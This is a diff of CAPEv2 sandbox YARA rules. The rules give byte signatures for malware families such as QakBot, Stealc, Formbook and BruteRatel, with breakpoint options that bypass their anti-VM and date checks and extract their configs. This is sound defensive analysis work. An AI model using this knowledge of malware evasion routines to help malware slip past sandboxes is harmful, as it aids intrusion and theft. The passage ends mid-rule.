-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "0b1a8be95b1b8a3b066837f9e47561ee8202d741b39d64e626c0461c2fbf7c70"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/QakBot.yar#L15-L29"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "ad75b07b9b786f634fd46cbe6dc089d3f732673320e70714e8ab058f0392c9f5"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "force-sleepskip=1"
-		packed = "e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7"
+		cape_options = "bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config"
+		packed = "f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68"
 
 	strings:
-		$sleep = {89 4C 24 08 48 83 EC 38 8B 44 24 40 48 69 C0 10 27 00 00 48 F7 D8 48 89 44 24 20 48 8D 54 24 20 33 C9 FF 15 [4] 48 83 C4 38 C3}
+		$params = {8B 7D ?? 8B F1 57 89 55 ?? E8 [4] 8D 9E [2] 00 00 89 03 59 85 C0 75 08 6A FC 58 E9}
+		$c2list1 = {59 59 8D 4D D8 89 45 E0 E8 [4] 8B 45 E0 85 C0 74 ?? 8B 90 [2] 00 00 51 8B 88 [2] 00 00 6A 00 E8}
+		$c2list2 = {59 59 8B F8 8D 4D ?? 89 7D ?? E8 [4] 85 FF 74 52 8B 97 [2] 00 00 51 8B 8F [2] 00 00 53 E8}
+		$conf = {5F 5E 5B C9 C3 51 6A 00 E8 [4] 59 59 85 C0 75 01 C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Stealcanti : FILE
+rule CAPE_Qakbotloader : FILE
 {
 	meta:
-		description = "Stealc detonation bypass"
+		description = "QakBot Export Selection"
 		author = "kevoreilly"
-		id = "32e5c1cf-ef57-58eb-9deb-fab0064cc676"
-		date = "2023-02-22"
-		modified = "2025-09-01"
+		id = "b2d5ef1c-0651-5249-9c4b-7e83235d4a30"
+		date = "2022-03-16"
+		modified = "2024-02-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Stealc.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d"
-		logic_hash = "4132e8094b0b49a89e9f40a8b1a6abbf105bbb04e4ddf3ce739e39fc2baf0d13"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/QakBot.yar#L31-L46"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a"
+		logic_hash = "00869c0a9bf62cde3f46ca915b0ef689557b09dc58d6de34609e3998abfa7e98"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$anti+17,action0=skip,count=1"
+		cape_options = "export=$export1,export=$export2,export=$export3"
 
 	strings:
-		$anti = {53 57 57 57 FF 15 [4] 8B F0 74 03 75 01 B8 E8 [4] 74 03 75 01 B8}
-		$decode = {6A 03 33 D2 8B F8 59 F7 F1 8B C7 85 D2 74 04 2B C2 03 C1 6A 06 C1 E0 03 33 D2 59 F7 F1}
+		$export1 = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74}
+		$export2 = {55 8B EC 3A ?? 74 [8-16] 74 [6-16] EB}
+		$export3 = {55 8B EC 66 3B ?? 74 [3-5] 74}
+		$wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E? [5-20] 74}
+		$getteb = {EB 00 55 8B EC 66 3B E4 74 ?? [1-5] 64 A1 18 00 00 00 5D EB}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and ( any of ( $export* ) ) and ( $wind or $getteb )
 }
-rule CAPE_Stealcstrings : FILE
+rule CAPE_Qakbotantivm
 {
 	meta:
-		description = "Stealc string decryption"
+		description = "QakBot AntiVM bypass"
 		author = "kevoreilly"
-		id = "087b5532-e1e7-5df9-adb2-bf758c8ba352"
-		date = "2023-02-22"
-		modified = "2025-09-01"
+		id = "7446522a-788a-512d-ad68-2fcc56169f5a"
+		date = "2022-03-16"
+		modified = "2024-02-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Stealc.yar#L15-L26"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6d402446a979c00b6257ace9924db381d98c530b22968bd2776c66d58c7faefc"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/QakBot.yar#L48-L59"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "e269497ce458b21c8427b3f6f6594a25d583490930af2d3395cb013b20d08ff7"
+		logic_hash = "20f1cd28f38945a3aa328e77e78525fb1ffc47ecf54d5a40c2f18264c3973989"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$decode+17,action0=string:edx,count=0,typestring=Stealc Strings"
-		packed = "d0c824e886f14b8c411940a07dc133012b9eed74901b156233ac4cac23378add"
+		tags = ""
+		cape_options = "bp0=$antivm1,action0=unwind,count=1"
 
 	strings:
-		$decode = {51 8B 15 [4] 52 8B 45 ?? 50 E8 [4] 83 C4 0C 6A 04 6A 00 8D 4D ?? 51 FF 15 [4] 83 C4 0C 8B 45 ?? 8B E5 5D C3}
+		$antivm1 = {55 8B EC 3A E4 0F [2] 00 00 00 6A 04 58 3A E4 0F [2] 00 00 00 C7 44 01 [5] 81 44 01 [5] 66 3B FF 74 ?? 6A 04 58 66 3B ED 0F [2] 00 00 00 C7 44 01 [5] 81 6C 01 [5] EB}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		all of them
 }
-rule CAPE_Stealcv2Strings : FILE
+rule CAPE_Cargobayloader : FILE
 {
 	meta:
-		description = "StealcV2 string decryption"
+		description = "CargoBayLoader anti-vm bypass"
 		author = "kevoreilly"
-		id = "d99fcc9c-35cc-5494-a0cd-738f3ae8d367"
-		date = "2023-02-22"
-		modified = "2025-09-01"
+		id = "5b347863-0bea-55d2-aaf3-b3d6e604be89"
+		date = "2023-02-20"
+		modified = "2023-02-20"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Stealc.yar#L28-L43"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "923f70edb3ad70957576994008729bf7a087479eed1973c42161aa96fa694baa"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/CargoBayLoader.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "75e975031371741498c5ba310882258c23b39310bd258239277708382bdbee9c"
+		logic_hash = "1d5c4ca79f97e1fac358189a8c6530be12506974fc2fb42f63b0b621536a45c9"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$decode32*,action0=string:[esp],bp1=$decode64,action1=string:eax,bp2=$dump,action2=dumpstrings,count=0,typestring=Stealc Strings"
-		packed = "2f42dcf05dd87e6352491ff9d4ea3dc3f854df53d548a8da0c323be42df797b6"
-		packed = "8301936f439f43579cffe98e11e3224051e2fb890ffe9df680bbbd8db0729387"
+		cape_options = "bp0=$jmp1+4,action0=skip,bp1=$jmp2+2,action1=skip,count=1,force-sleepskip=1"
 
 	strings:
-		$decode32 = {AB AB AB AB 8B 45 0C 89 4E 10 89 4E 14 39 45 08 75 0B C7 46 14 0F 00 00 00 88 0E EB 0F 2B 45 08 50 51 FF 75 ?? 8B}
-		$decode64 = {40 53 48 83 EC 20 48 8B 19 48 85 DB 74 ?? 48 8B 53 18 48 83 FA 0F 76 2C 48 8B 0B 48 FF C2 48 81 FA 00 10 00 00 72}
-		$dump32 = {33 C0 89 46 30 88 46 34 89 46 38 89 46 3C 89 46 40 89 46 44 89 46 48 89 46 4C 89 46 50 89 46 54 89 46 58 8B C6 5F 5E C3}
-		$dump64 = {48 8B C7 89 6F 40 40 88 6F 44 48 89 6F 48 48 89 6F 50 48 89 6F 58 48 89 6F 60 48 89 6F 68 48 89 6F 70 48 89 6F 78 48 89}
+		$jmp1 = {40 42 0F 00 0F 82 [2] 00 00 48 8D 15 [4] BF 04 00 00 00 41 B8 04 00 00 00 4C 8D [3] 4C 89 F1 E8}
+		$jmp2 = {84 DB 0F 85 [2] 00 00 48 8D 15 [4] 41 BE 03 00 00 00 41 B8 03 00 00 00 4C 8D 7C [2] 4C 89 F9 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Stealcv2Datecheck : FILE
+rule CAPE_Heavenssyscall : FILE
 {
 	meta:
-		description = "StealcV2 date check bypass"
+		description = "Bypass variants of heaven's gate direct syscalls"
 		author = "kevoreilly"
-		id = "4969d005-3532-5b75-9fa9-10e09bab338e"
-		date = "2023-02-22"
-		modified = "2025-09-01"
+		id = "7c60102a-ac8b-5e28-8dbb-4b6c3f4cddff"
+		date = "2024-03-25"
+		modified = "2024-03-25"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Stealc.yar#L45-L56"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "f074aceb7c111156752891acac8690c00dad7c26240fb0752cc12a9a65aa3d30"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/HeavensSyscall.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "aeb981fcba0936ff8b1be4c601445fd45e5d3b74856a9439d351edd57f5a50c3"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "patch=$date32*-1:B000,patch=$date64*-2:B00090"
+		cape_options = "clear,br0=$gate1-9,action1=seteax:0,count=0,sysbp=$sysenter+10"
+		packed = "2950b4131886e06bdb83ab1611b71273df23b0d31a4d8eb6baddd33327d87ffa"
 
 	strings:
-		$date32 = {F3 A5 8D 45 ?? 50 E8 [4] 59 8B F8 8B F2 8D 45 ?? 50 E8 [4] 59 3B F2 7C 08 7F 04 3B F8 76 02 B3 01 8A C3}
-		$date64 = {0F 11 44 [2] 0F 11 8C [2] 00 00 00 89 8C [2] 00 00 00 48 8D 4C [2] E8 [4] 48 8B D8 48 8D 4C [2] E8 [4] 48 3B D8 0F 9F C0}
+		$gate1 = {00 00 00 00 74 24 8D 45 F8 50 6A FF FF 95 [4] 85 C0 74 08 8B 4D F8 89 4D FC EB 07 C7 45 FC 00 00 00 00 8B 45 FC EB 02 33 C0 8B E5 5D C2 C0}
+		$sysenter = {68 [4] E8 [4] E8 [4] C2 ?? 00 CC CC CC CC CC CC CC CC}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x8B55 and all of them
 }
-rule CAPE_Latrodectus : FILE
+rule CAPE_Aurastealerbypass
 {
 	meta:
-		description = "Latrodectus export selection"
+		description = "Bypass AuraStealer"
+		author = "enzok"
+		id = "e510f46b-de7c-50d1-bff3-97c3acf0452e"
+		date = "2025-09-02"
+		modified = "2025-09-02"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/AuraStealer.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "ae174c96c262b1734c58bd6c5f7112221b08596c180612e4970acada35dbd070"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_options = "bp0=$antivm1+3,action0=skip,count=0"
+		packed = "a9c47f10d5eb77d7d6b356be00b4814a7c1e5bb75739b464beb6ea03fc36cc85"
+
+	strings:
+		$antivm1 = {39 04 11 0f 94 C3 8B 44 ?? ?? 85 C0}
+		$conf = {8D BE ?? 00 00 00 68 00 40 00 00 5? 5? FF D1 83 C4 ?? 8B 07 8B 57 04 29 C2}
+		$keyexpansion = {31 C0 8A 1C 82 88 1C 81 8A 5C 82 01 88 5C 81 01 8A 5C 82 02 88 5C 81 02 8A 5C 82 03 88 5C 81 03 4? 83 F8 08 75 ?? B? 08 00 00 00}
+
+	condition:
+		all of them
+}
+rule CAPE_Stealcanti : FILE
+{
+	meta:
+		description = "Stealc detonation bypass"
 		author = "kevoreilly"
-		id = "7c6f167a-6b76-5509-b164-306d1cd19b0f"
-		date = "2024-02-26"
-		modified = "2024-02-26"
+		id = "32e5c1cf-ef57-58eb-9deb-fab0064cc676"
+		date = "2023-02-22"
+		modified = "2025-09-01"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Latrodectus.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05"
-		logic_hash = "c2c9f23e287253d766425c05eb774f6e07bdcbabc259e04b723a1a87c8b91fbd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Stealc.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d"
+		logic_hash = "4132e8094b0b49a89e9f40a8b1a6abbf105bbb04e4ddf3ce739e39fc2baf0d13"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_options = "bp0=$anti+17,action0=skip,count=1"
 
 	strings:
-		$export = {48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 EC 30 4C 8B 05 [4] 33 D2 C7 40 [5] 88 50 ?? 49 63 40 3C 42 8B 8C 00 88 00 00 00 85 C9 0F 84}
+		$anti = {53 57 57 57 FF 15 [4] 8B F0 74 03 75 01 B8 E8 [4] 74 03 75 01 B8}
+		$decode = {6A 03 33 D2 8B F8 59 F7 F1 8B C7 85 D2 74 04 2B C2 03 C1 6A 06 C1 E0 03 33 D2 59 F7 F1}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Dridexloader : FILE
+rule CAPE_Stealcstrings : FILE
 {
 	meta:
-		description = "DridexLoader API Spam Bypass"
+		description = "Stealc string decryption"
 		author = "kevoreilly"
-		id = "a8b62f64-87a0-58d3-8876-9b0f6a7deb97"
-		date = "2021-03-09"
-		modified = "2021-03-09"
+		id = "087b5532-e1e7-5df9-adb2-bf758c8ba352"
+		date = "2023-02-22"
+		modified = "2025-09-01"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/DridexLoader.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "00a3e4e80a2558ee52035f091e2339fa2dad6f6515b9dc099f2f3800e4c70bce"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Stealc.yar#L15-L26"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6d402446a979c00b6257ace9924db381d98c530b22968bd2776c66d58c7faefc"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$trap-13,action0=ret,count=0"
+		cape_options = "bp0=$decode+17,action0=string:edx,count=0,typestring=Stealc Strings"
+		packed = "d0c824e886f14b8c411940a07dc133012b9eed74901b156233ac4cac23378add"
 
 	strings:
-		$trap = {6A 50 6A 14 6A 03 5A 8D 4C 24 ?? E8 [4] 68 [4] 68 [4] E8 [4] 85 C0 74 05}
+		$decode = {51 8B 15 [4] 52 8B 45 ?? 50 E8 [4] 83 C4 0C 6A 04 6A 00 8D 4D ?? 51 FF 15 [4] 83 C4 0C 8B 45 ?? 8B E5 5D C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $trap
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Bruteratelsyscall
+rule CAPE_Stealcv2Strings : FILE
 {
 	meta:
-		description = "BruteRatel Syscall Bypass"
+		description = "StealcV2 string decryption"
 		author = "kevoreilly"
-		id = "0ddc3e0a-c4ca-5342-b029-107ce1f2751e"
-		date = "2024-07-11"
-		modified = "2024-07-22"
+		id = "d99fcc9c-35cc-5494-a0cd-738f3ae8d367"
+		date = "2023-02-22"
+		modified = "2025-09-01"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/BruteRatel.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "5ed054b3cd5d2659c250945d55d6adac90945963c34ad2af0f8d7436141e86b6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Stealc.yar#L28-L43"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "923f70edb3ad70957576994008729bf7a087479eed1973c42161aa96fa694baa"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "sysbp=$syscall1+6,sysbp=$syscall2+8"
+		tags = "FILE"
+		cape_options = "bp0=$decode32*,action0=string:[esp],bp1=$decode64,action1=string:eax,bp2=$dump,action2=dumpstrings,count=0,typestring=Stealc Strings"
+		packed = "2f42dcf05dd87e6352491ff9d4ea3dc3f854df53d548a8da0c323be42df797b6"
+		packed = "8301936f439f43579cffe98e11e3224051e2fb890ffe9df680bbbd8db0729387"
 
 	strings:
-		$syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)}
-		$syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24}
+		$decode32 = {AB AB AB AB 8B 45 0C 89 4E 10 89 4E 14 39 45 08 75 0B C7 46 14 0F 00 00 00 88 0E EB 0F 2B 45 08 50 51 FF 75 ?? 8B}
+		$decode64 = {40 53 48 83 EC 20 48 8B 19 48 85 DB 74 ?? 48 8B 53 18 48 83 FA 0F 76 2C 48 8B 0B 48 FF C2 48 81 FA 00 10 00 00 72}
+		$dump32 = {33 C0 89 46 30 88 46 34 89 46 38 89 46 3C 89 46 40 89 46 44 89 46 48 89 46 4C 89 46 50 89 46 54 89 46 58 8B C6 5F 5E C3}
+		$dump64 = {48 8B C7 89 6F 40 40 88 6F 44 48 89 6F 48 48 89 6F 50 48 89 6F 58 48 89 6F 60 48 89 6F 68 48 89 6F 70 48 89 6F 78 48 89}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Bruteratelpacker
+rule CAPE_Stealcv2Datecheck : FILE
 {
 	meta:
-		description = "BruteRatel Outer Encryption Layer"
+		description = "StealcV2 date check bypass"
 		author = "kevoreilly"
-		id = "631083be-7058-590a-a394-984545f42ad7"
-		date = "2024-07-11"
-		modified = "2024-07-22"
+		id = "4969d005-3532-5b75-9fa9-10e09bab338e"
+		date = "2023-02-22"
+		modified = "2025-09-01"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/BruteRatel.yar#L14-L26"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "2ccb17efe378d034df34d20d7580c58171d0fd11c18fef6c9a23f1ba238514e6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Stealc.yar#L45-L56"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "f074aceb7c111156752891acac8690c00dad7c26240fb0752cc12a9a65aa3d30"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp1=$outer*,action1=scan,count=0"
+		tags = "FILE"
+		cape_options = "patch=$date32*-1:B000,patch=$date64*-2:B00090"
 
 	strings:
-		$outer = {83 45 F8 01 81 7D F8 FF 00 00 00 7E ?? 83 45 FC 01 8B 45 FC 3B 45 ?? 7E ?? 48}
-		$inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF}
-		$date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00}
+		$date32 = {F3 A5 8D 45 ?? 50 E8 [4] 59 8B F8 8B F2 8D 45 ?? 50 E8 [4] 59 3B F2 7C 08 7F 04 3B F8 76 02 B3 01 8A C3}
+		$date64 = {0F 11 44 [2] 0F 11 8C [2] 00 00 00 89 8C [2] 00 00 00 48 8D 4C [2] E8 [4] 48 8B D8 48 8D 4C [2] E8 [4] 48 3B D8 0F 9F C0}
 
 	condition:
-		($outer ) and not ( $inner ) and not ( $date )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Bruterateldate
+rule CAPE_Formhooka
 {
 	meta:
-		description = "BruteRatel Date Check Bypass"
+		description = "Formbook Anti-hook Bypass"
 		author = "kevoreilly"
-		id = "94dd5cf3-ed59-51d6-92c8-aee73fe2926b"
-		date = "2024-07-11"
-		modified = "2024-07-22"
+		id = "6369de74-99eb-57ae-a315-c15f22effc73"
+		date = "2021-03-07"
+		modified = "2025-12-08"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/BruteRatel.yar#L28-L39"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "88589b2d08aea03565668ff1b9af20b6fe11cda50d867c60db7cb4d1826b0fd7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Formbook.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "21b8101a7039cfad0e9d49cc1f055bc23a2eb4c973dcda2a81a007e452d77a6d"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "clear,bp1=$inner*,action1=scan,bp2=$date+6,action2=skip,count=0"
+		cape_options = "clear,bp0=$remap_ntdll_0,action0=setedx:ntdll,count0=1,bp1=$remap_ntdll_1,action1=setdst:ntdll,count1=1"
+		packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522"
+		packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb"
 
 	strings:
-		$inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF}
-		$date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00}
+		$remap_ntdll_0 = {33 56 04 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
+		$remap_ntdll_1 = {33 56 0C 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
 
 	condition:
 		any of them
 }
-rule CAPE_Bruteratelconfig
+rule CAPE_Formconfa
 {
 	meta:
-		description = "BruteRatel Config Extraction"
+		description = "Formbook Config Extraction"
 		author = "kevoreilly"
-		id = "5ae680b0-5ad2-5e82-87f8-b0af4fec18de"
-		date = "2024-07-11"
-		modified = "2024-07-22"
+		id = "f9c3fc92-e2c8-5968-b0f4-80bd8199b7ca"
+		date = "2021-03-07"
+		modified = "2025-12-08"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/BruteRatel.yar#L41-L51"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "b1815aafec940ab6c8daafc68ccf294845221ada260de5209dcb7e49ccd061c7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Formbook.yar#L32-L44"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "b0aa4cec55a21245d8104380c531dd6cc0fdef64fbefd79616eadfb4e95b2d75"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "clear,br1=$decode,count=0,action0=string:eax,typestring=BruteRatel Config"
+		cape_options = "clear,bp0=$c2,action0=string:rcx+1,bp1=$decoy+67,action1=string:rcx+1,count=0,typestring=Formbook Config"
+		packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb"
 
 	strings:
-		$decode = {55 57 56 53 48 83 EC ?? 31 C0 48 89 CB 48 89 D7 44 89 C6 44 89 CD 44 39 01 77 ?? 41 8D 48 01 E8 [4] 31 C9}
+		$c2 = {44 8B C6 48 8B D3 49 8B CE E8 [4] 44 88 23 41 8B DD 48 8D [2] 66 66 66 0F 1F 84 00 00 00 00 00 BA 8D 00 00 00 41 FF C4}
+		$decoy = {8B D7 0F 1F 44 00 00 0F B6 03 FF C0 48 98 48 03 D8 48 FF CA 75 ?? 44 0F B6 03 48 8D 53 01 48 8D 4C [2] E8}
 
 	condition:
 		all of them
 }
-rule CAPE_Themida : FILE
+rule CAPE_Formhelper
 {
 	meta:
-		description = "Themida detonation shim"
+		description = "Formbook Config Extraction"
 		author = "kevoreilly"
-		id = "cd5c8b08-4864-57f7-b218-1bcb6892bea8"
-		date = "2024-09-10"
-		modified = "2024-09-11"
+		id = "88ff1354-1ae7-5380-a586-ef95212d59df"
+		date = "2021-03-07"
+		modified = "2025-12-08"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Themida.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "c4f1e01a3fe3cb66062ce03253bfe9edc09dc6f1a77db99b281106e8ceff9257"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Formbook.yar#L46-L58"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "77cdfc94aac089c4f2590f4afbab35351fc6e104e67813548c68c59d27019a63"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_options = "unhook-apis=NtSetInformationThread,force-sleepskip=0"
-		packed = "6337ff4cf413f56cc6c9a8e67f24b8d7f94f620eae06ac9f0b113b5ba82ea176"
+		tags = ""
